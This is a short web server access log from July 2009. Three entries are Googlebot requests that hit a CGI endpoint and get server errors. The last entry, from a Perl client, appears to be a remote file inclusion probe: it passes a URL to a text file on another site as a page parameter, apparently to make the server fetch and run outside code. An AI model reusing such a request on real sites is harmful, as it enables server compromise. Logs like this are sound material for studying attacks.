66.249.68.79 - - [26/Jul/2009:03:57:01 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1128A24295140900BFD2003+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:03:57:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1128A24294F48900BED2003+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [26/Jul/2009:03:57:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0127F14092D4E900A7A200K+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.221.130.14 - - [26/Jul/2009:03:57:33 -0400] "GET /index.php?meio=http://www.souvenirgeschaeft.de//components/com_virtuemart/log.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
